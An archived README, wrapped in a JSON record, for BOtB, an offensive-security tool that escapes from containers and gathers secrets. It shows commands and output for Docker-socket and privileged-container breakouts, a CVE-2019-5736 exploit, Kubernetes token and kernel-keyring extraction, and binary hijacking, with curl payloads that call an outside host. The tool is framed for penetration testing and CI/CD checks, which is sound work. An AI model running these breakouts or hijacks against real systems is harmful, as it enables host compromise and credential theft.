{
	"id": "615952f2-19b1-4145-b085-569f8b2784f3",
	"created_at": "2026-04-06T00:15:59.902241Z",
	"updated_at": "2026-04-10T13:12:44.243295Z",
	"deleted_at": null,
	"sha1_hash": "a3a496af4fb351936fe32bf92badbb11a957c75e",
	"title": "GitHub - brompwnie/botb: A container analysis and exploitation tool for pentesters and engineers.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 137275,
	"plain_text": "GitHub - brompwnie/botb: A container analysis and exploitation\r\ntool for pentesters and engineers.\r\nBy Chris le roy\r\nArchived: 2026-04-05 18:13:46 UTC\r\nD O W N L O A D S 1 5 9 K\r\nBreak out the Box (BOtB)\r\nBOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also\r\nbeing CI/CD friendly with common CI/CD technologies.\r\nWhat does it do?\r\nBOtB is a CLI tool which allows you to:\r\nExploit common container vulnerabilities\r\nPerform common container post exploitation actions\r\nProvide capability when certain tools or binaries are not available in the Container\r\nUse BOtB's capabilities with CI/CD technologies to test container deployments\r\nPerform the above in either a manual or automated approach\r\nCurrent Capabilities\r\nPerform a container breakout via exposed Docker daemons (docker.sock)\r\nPerform a container breakout via CVE-2019-5736\r\nPerform a privileged container breakout via enabled CAPS and SYSCALLS\r\nExtract data from Linux Kernel Keyrings via abusing the Keyctl syscall through permissive seccomp\r\nprofiles\r\nIdentify Kubernetes Service Accounts secrets and attempt to use them\r\nIdentify metadata services endpoints i.e http://169.254.169.254, http://metadata.google.internal/ and\r\nhttp://100.100.100.200/\r\nScrape metadata info from GCP metadata endpoints\r\nAnalyze and identify sensitive strings in ENV and process in the ProcFS i.e /Proc/{pid}/Environ\r\nFind and Identify UNIX Domain Sockets\r\nIdentify UNIX domain sockets which support HTTP\r\nFind and identify the Docker Daemon on UNIX domain sockets or on an interface\r\nHijack host binaries with a custom payload\r\nPerform actions in CI/CD mode and only return exit codes \u003e 0\r\nPush data to an S3 bucket\r\nhttps://github.com/brompwnie/botb\r\nPage 1 of 12\n\nForce BOtB to always return a Exit Code of 0 (useful for non-blocking CI/CD)\r\nPerform the above from the CLI arguments or from a YAML config file\r\nPerform reverse DNS lookup\r\nInstallation\r\nBinaries\r\nFor installation instructions from binaries please visit the Releases Page.\r\nVia Go\r\ngo get github.com/brompwnie/botb\r\nBuilding from source\r\nBuilding BOtB via Go:\r\nBuilding BOtB via Make:\r\nUsage\r\nBOtB can be compiled into a binary for the targeted platform and supports the following usage\r\n./botb-linux-amd64 -h\r\n-aggr string\r\n Attempt to exploit RuncPWN (default \"nil\")\r\n -always-succeed\r\n Always set BOtB's Exit code to Zero\r\n -autopwn\r\n Attempt to autopwn exposed sockets\r\n -cicd\r\n Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0\r\n -config string\r\n Load config from provided yaml file (default \"nil\")\r\n -endpoints string\r\n Provide a textfile with endpoints to use for test (default \"nil\")\r\n -find-docker\r\n Attempt to find Dockerd\r\n -find-http\r\n Hunt for Available UNIX Domain Sockets with HTTP\r\n -find-sockets\r\n Hunt for Available UNIX Domain Sockets\r\n -hijack string\r\n Attempt to hijack binaries on host (default \"nil\")\r\nhttps://github.com/brompwnie/botb\r\nPage 2 of 12\n\n-k8secrets\r\n Identify and Verify K8's Secrets\r\n -keyMax int\r\n Maximum key id range (default 100000000) and max system value is 999999999 (default 100000000)\r\n -keyMin int\r\n Minimum key id range (default 1) (default 1)\r\n -metadata\r\n Attempt to find metadata services\r\n -path string\r\n Path to Start Scanning for UNIX Domain Sockets (default \"/\")\r\n -pwn-privileged string\r\n Provide a command payload to try exploit --privilege CGROUP release_agent's (default \"nil\")\r\n -pwnKeyctl\r\n Abuse keyctl syscalls and extract data from Linux Kernel keyrings\r\n -recon\r\n Perform Recon of the Container ENV\r\n -region string\r\n Provide a AWS Region e.g eu-west-2 (default \"nil\")\r\n -rev-dns string\r\n Perform reverse DNS lookups on a subnet. Parameter must be in CIDR notation, e.g., -rev-dns 192.168.0.0/\r\n -s3bucket string\r\n Provide a bucket name for S3 Push (default \"nil\")\r\n -s3push string\r\n Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME wou\r\n -scrape-gcp\r\n Attempt to scrape the GCP metadata service\r\n -verbose\r\n Verbose output\r\n -wordlist string\r\n Provide a wordlist (default \"nil\")\r\nBOtB can also be instructed to load settings from a YAML file via the config parameter\r\n#./botb-linux-amd64 -config=cfg.yml\r\n[+] Break Out The Box\r\n[+] Loading Config: cfg.yml\r\n...\r\nThe following usage examples will return a Exit Code \u003e 0 by default when an anomaly is detected, this is depicted\r\nby \"echo $?\" which shows the exit code of the last executed command.\r\nIdentify and Extract Linux Kernel Keyring Secrets that have not been properly protected\r\nMore info from the original author here https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/\r\nhttps://github.com/brompwnie/botb\r\nPage 3 of 12\n\n#./botb-linux-amd64 -pwnKeyctl=true -keyMin=0 -keyMax=100000000\r\n[+] Break Out The Box\r\n[*] Attempting to Identify and Extract Keyring Values\r\n[!] WARNING, this can be resource intensive and your pod/container process may be killed, iterate over min and m\r\n[!] Subkey description for key [251133632]: user;0;0;3f010000;brompwnie_secret\r\n[!] Output {\r\n \"KeyId\": 13738777,\r\n \"Valid\": true,\r\n \"Name\": \"_ses.e326b8816c24d0ddda6c2c82ecf62ea2302a7239fce2fd104775d154a97fa3d6\",\r\n \"Type\": \"keyring\",\r\n \"Uid\": \"0\",\r\n \"Gid\": \"0\",\r\n \"Perms\": \"3f1b0000\",\r\n \"String_Content\": \"\\ufffd\\ufffd\\ufffd\\u000e\",\r\n \"Byte_Content\": \"wP73Dg==\",\r\n \"Comments\": null,\r\n \"Subkeys\": [\r\n {\r\n \"KeyId\": 251133632,\r\n \"Valid\": true,\r\n \"Name\": \"brompwnie_secret\",\r\n \"Type\": \"user\",\r\n \"Uid\": \"0\",\r\n \"Gid\": \"0\",\r\n \"Perms\": \"3f010000\",\r\n \"String_Content\": \"thetruthisialsoreallyliketrees\",\r\n \"Byte_Content\": \"dGhldHJ1dGhpc2lhbHNvcmVhbGx5bGlrZXRyZWVz\",\r\n \"Comments\": null,\r\n \"Subkeys\": null,\r\n \"Output\": \"\"\r\n }\r\n ],\r\n \"Output\": \"\"\r\n}\r\n[+] Finished\r\nIdentify and Verify mounted Kubernetes Service Account Secrets\r\n#./botb-linux-amd64 -k8secrets=true\r\n[+] Break Out The Box\r\n[*] Identifying and Verifying K8's Secrets\r\n[!] Token found at: /var/run/secrets/kubernetes.io/serviceaccount/token\r\n[!] Token found at: /run/secrets/kubernetes.io/serviceaccount/token\r\n[*] Trying: https://kubernetes.default/api/v1\r\n[!] Valid response with token (xxxxxxxxxx...)on -\u003e https://kubernetes.default/api/v1\r\nhttps://github.com/brompwnie/botb\r\nPage 4 of 12\n\n[*] Trying: https://kubernetes.default/api/v1/namespaces\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods\r\n[*] Trying: https://kubernetes.default/api/v1\r\n[!] Valid response with token (xxxxxxxxxx...)on -\u003e https://kubernetes.default/api/v1\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods\r\n[+] Finished\r\nBreak out from Container via Exposed Docker Daemon\r\nThis approach will breakout into an interactive TTY on the host.\r\n#./bob_linux_amd64 -autopwn=true\r\n[+] Break Out The Box\r\n[+] Attempting to autopwn\r\n[+] Hunting Docker Socks\r\n[+] Attempting to autopwn: /var/meh\r\n[+] Attempting to escape to host...\r\n[+] Attempting in TTY Mode\r\n./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh\r\nchroot /host \u0026\u0026 clear\r\necho 'You are now on the underlying host'\r\nYou are now on the underlying host\r\n/ #\r\nBreak out of a Container but in a CI/CD Friendly way\r\nThis approach does not escape into a TTY on the host but instead returns an Exit Code \u003e 0 to indicate a successful\r\ncontainer breakout.\r\n#./bob_linux_amd64 -autopwn=true -cicd=true\r\n[+] Break Out The Box\r\n[+] Attempting to autopwn\r\n[+] Hunting Docker Socks\r\n[+] Attempting to autopwn: /var/meh\r\n[+] Attempting to escape to host...\r\n[!] Successfully escaped container\r\n[+] Finished\r\n#echo $?\r\n1\r\nExploit CVE-2019-5736 with a Custom Payload\r\nhttps://github.com/brompwnie/botb\r\nPage 5 of 12\n\nPlease note that for this exploit to work, a process has to be executed in the target container in this scenario.\r\n#./bob_linux_amd64 -aggr='curl \"https://some.endpoint.com?command=$0\u0026param1=$1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261'\r\n[+] Break Out The Box[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIM\r\n[+] Attempting to exploit CVE-2019-5736 with command: curl \"https://bobendpoint.herokuapp.com/canary/bobby?comm\r\n1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261\r\n[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped\r\n[+] Finished\r\nHijack Commands/Binaries on a Host with a Custom Payload\r\nPlease note that this can be used to test if external entities are executing commands within the container. Examples\r\nare Docker Exec and Kubetcl CP.\r\n#./bob_linux_amd64 -hijack='curl \"https://bobendpoint.herokuapp.com/canary/bobby?command=$0\u0026param1=$\r\n1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261'\r\n[+] Break Out The Box\r\n[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...\r\n[+] Attempting to hijack binaries\r\n[*] Command to be used: curl \"https://bobendpoint.herokuapp.com/canary/bobby?command=$0\u0026param1=$1\u0026param2=$2\"\u003e/d\r\n[+] Currently hijacking: /bin\r\n[+] Currently hijacking: /sbin\r\n[+] Currently hijacking: /usr/bin\r\n[+] Finished\r\nFind UNIX Domain Sockets\r\n#./botb-linux-amd64 -find-sockets=true\r\n[+] Break Out The Box\r\n[+] Hunting Down UNIX Domain Sockets from: /\r\n[!] Valid Socket: /var/meh\r\n[+] Finished\r\n#echo $?\r\n1\r\nFind a Docker Daemon\r\n#./bob_linux_amd64 -find-docker=true\r\n[+] Break Out The Box\r\n[+] Looking for Dockerd\r\n[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375\r\n[+] Hunting Docker Socks\r\n[!] Valid Docker Socket: /var/meh\r\nhttps://github.com/brompwnie/botb\r\nPage 6 of 12\n\n[+] Finished\r\n#echo $?\r\n1\r\nAnalyze ENV and ProcFS Environ for Sensitive Strings\r\nBy default BOtB will search for the two terms \"secret\" and \"password\".\r\n ./bob_linux_amd64 -recon=true\r\n[+] Break Out The Box\r\n[+] Performing Container Recon\r\n[+] Searching /proc/* for data\r\n[!] Sensitive keyword found in: /proc/1/environ -\u003e 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bi\r\n[!] Sensitive keyword found in: /proc/12/environ -\u003e 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/ap\r\n[!] Sensitive keyword found in: /proc/self/environ -\u003e 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordO\r\n[!] Sensitive keyword found in: /proc/thread-self/environ -\u003e 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpa\r\n[+] Checking ENV Variables for secrets\r\n[!] Sensitive Keyword found in ENV: foo=secretpassword\r\n[+] Finished\r\n#echo $?\r\n1\r\nA wordlist can be supplied to BOtB to scan for particular keywords.\r\n#cat wordlist.txt\r\nmoo\r\n# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt\r\n[+] Break Out The Box\r\n[+] Performing Container Recon\r\n[+] Searching /proc/* for data\r\n[*] Loading entries from: wordlist.txt\r\n[+] Checking ENV Variables for secrets\r\n[*] Loading entries from: wordlist.txt\r\n[+] Finished\r\n# echo $?\r\n0\r\nScan for Metadata Endpoints\r\nBOtB by default scans for two Metadata endpoints.\r\nhttps://github.com/brompwnie/botb\r\nPage 7 of 12\n\n# ./bob_linux_amd64 -metadata=true\r\n[+] Break Out The Box\r\n[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'\r\n[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'\r\n[+] Finished\r\n# echo $?\r\n0\r\nBOtB can also be supplied with a list of endpoints to scan for.\r\n# cat endpoints.txt\r\nhttps://heroku.com\r\n# ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt\r\n[+] Break Out The Box\r\n[*] Loading entries from: endpoints.txt\r\n[*] Attempting to query metadata endpoint: 'https://heroku.com'\r\n[!] Reponse from 'https://heroku.com' -\u003e 200\r\n[+] Finished\r\n# echo $?\r\n1\r\nScan for UNIX Domain Sockets that respond to HTTP\r\n# ./bob_linux_amd64 -find-http=true\r\n[+] Break Out The Box\r\n[+] Looking for HTTP enabled Sockets\r\n[!] Valid HTTP Socket: /var/run/docker.sock\r\n[+] Finished\r\nScrape data from GCP metadata instance\r\n# ./botb_linux_amd64 -scrape-gcp=true\r\n[+] Break Out The Box\r\n[+] Attempting to connect to: 169.254.169.254:80\r\n[*] Output-\u003e\r\n HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/text\r\nDate: Sun, 30 Jun 2019 21:53:41 GMT\r\nhttps://github.com/brompwnie/botb\r\nPage 8 of 12\n\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 21013\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0\r\n0.1/meta-data/attached-disks/disks/0/index 0\r\n0.1/meta-data/attached-disks/disks/0/mode READ_WRITE\r\n.....\r\nPush data to an AWS S3 Bucket\r\n# ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2\r\n[+] Break Out The Box\r\n[+] Pushing fileToPush.tar.gz -\u003e nameOfS3Bucket\r\n[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz\r\n[+] Finished\r\nBreak out of a Privileged Container\r\n# ./bob_linux_amd64 -pwn-privileged=hostname\r\n[+] Break Out The Box\r\n[+] Attempting to exploit CGROUP Privileges\r\n[*] The result of your command can be found in /output\r\n[+] Finished\r\nroot@418fa238e34d:/app# cat /output\r\ndocker-desktop\r\nForce BOtB to always succeed with a Exit Code of 0\r\nThis is useful for non-blocking CI/CD tests\r\n# ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed-true\r\n[+] Break Out The Box\r\n[+] Attempting to exploit CGROUP Privileges\r\n[*] The result of your command can be found in /output\r\n[+] Finished\r\n# echo $?\r\n0\r\nhttps://github.com/brompwnie/botb\r\nPage 9 of 12\n\nUsing BOtB with a YAML config file\r\nExample YAML file cfg.yml\r\npayload: id\r\nverbose: false\r\nalways-succeed: true\r\ncicd: false\r\nendpointlist: endpoints.txt\r\nwordlist: wordlist.txt\r\npath: /\r\nmode: find-sockets\r\nRun BOtB with the above YAML\r\n# ./bob_linux_amd64 -config=cfg.yml\r\n[+] Break Out The Box\r\n[+] Loading Config: cfg.yml\r\n[+] Looking for UNIX Domain Sockets from: /\r\n[!] Valid Socket: /tmp/thisisnotasocket.mock\r\n[+] Finished\r\nUsing BOtB with CI\\CD\r\nBOtB can be used with CI\\CD technologies that make use of exit codes to determine if tests have passed or failed.\r\nBelow is a Shell script that executes two BOtB tests and the exit codes of the two tests are used to set the exit of\r\nthe Shell script. If any of the two tests return an Exit Code \u003e0, the test executing the shell script will fail.\r\n#!/bin/sh\r\nexitCode=0\r\necho \"[+] Testing UNIX Sockets\"\r\n./bob_linux_amd64 -autopwn -cicd=true\r\nexitCode=$?\r\necho \"[+] Testing Env\"\r\n./bob_linux_amd64 -recon=true\r\nexitCode=$?\r\n(exit $exitCode)\r\nhttps://github.com/brompwnie/botb\r\nPage 10 of 12\n\nThe above script is not the only way to use BOtB with CI\\CD technologies but could also be used by itself and not\r\nwrapped in a shell script. An example YML config would be:\r\nversion: 2\r\ncicd:\r\n runATest: ./bob_linux_amd64 -autopwn -cicd=true\r\nBelow is an example config that can be used with Heroku CI:\r\n{\r\n \"environments\": {\r\n \"test\": {\r\n \"scripts\": {\r\n \"test\": \"./bob_linux_amd64 -autopwn -cicd=true\"\r\n }\r\n }\r\n }\r\n}\r\nBelow is an example config with Heroku CI but using a wrapper shell script:\r\n{\r\n \"environments\": {\r\n \"test\": {\r\n \"scripts\": {\r\n \"test\": \"./bin/testSocksAndEnv.sh\"\r\n }\r\n }\r\n }\r\n}\r\nIssues, Bugs and Improvements\r\nFor any bugs, please submit an issue. There is a long list of improvements but please submit an Issue if there is\r\nsomething you want to see added to BOtB.\r\nReferences and Resources\r\nThis tool would not be possible without the contribution of others in the community, below is a list of resources\r\nthat have helped me.\r\nhttps://docs.docker.com/engine/security/https/\r\nhttps://github.com/brompwnie/botb\r\nPage 11 of 12\n\nhttps://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp\r\nhttps://docs.docker.com/engine/reference/commandline/exec/\r\nhttps://github.com/GoogleContainerTools/container-structure-test\r\nhttps://github.com/coreos/clair\r\nhttps://github.com/aquasecurity/docker-bench\r\nhttps://www.cisecurity.org/benchmark/docker/\r\nhttps://github.com/Frichetten/CVE-2019-5736-PoC\r\nhttps://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/\r\nhttps://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/\r\nhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html\r\nhttps://github.com/wagoodman/dive\r\nhttps://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-\r\n%20BruCON%202018.pdf\r\nhttps://github.com/singe/container-breakouts\r\nhttps://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/\r\nhttps://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/\r\nhttps://github.com/antitree/keyctl-unmask#keyctl-unmask\r\nhttps://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/\r\nTalks and Events\r\nBOtB is scheduled to be presented at the following:\r\nBSides London 2019 (https://sched.co/PAwB) and slides can be found here\r\nhttps://github.com/brompwnie/bsideslondon2019\r\nBlackhat Las Vegas Arsenal 2019 (https://www.blackhat.com/us-19/arsenal/schedule/index.html#break-out-the-box-botb-container-analysis-exploitation-and-cicd-tool-14988)\r\nDefCon 27 Cloud Village (https://cloud-village.org/)\r\nBlackhat Europe 2019 (https://www.blackhat.com/eu-19/briefings/schedule/index.html#reverse-engineering-and-exploiting-builds-in-the-cloud-17287)\r\nDevSecCon London 2019 (https://www.devseccon.com/london-2019/)\r\nLicense\r\nBOtB is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License\r\n(http://creativecommons.org/licenses/by-nc-sa/4.0).\r\nSource: https://github.com/brompwnie/botb\r\nhttps://github.com/brompwnie/botb\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/brompwnie/botb"
	],
	"report_names": [
		"botb"
	],
	"threat_actors": [],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.pdf",
		"text": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.txt",
		"img": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.jpg"
	}
}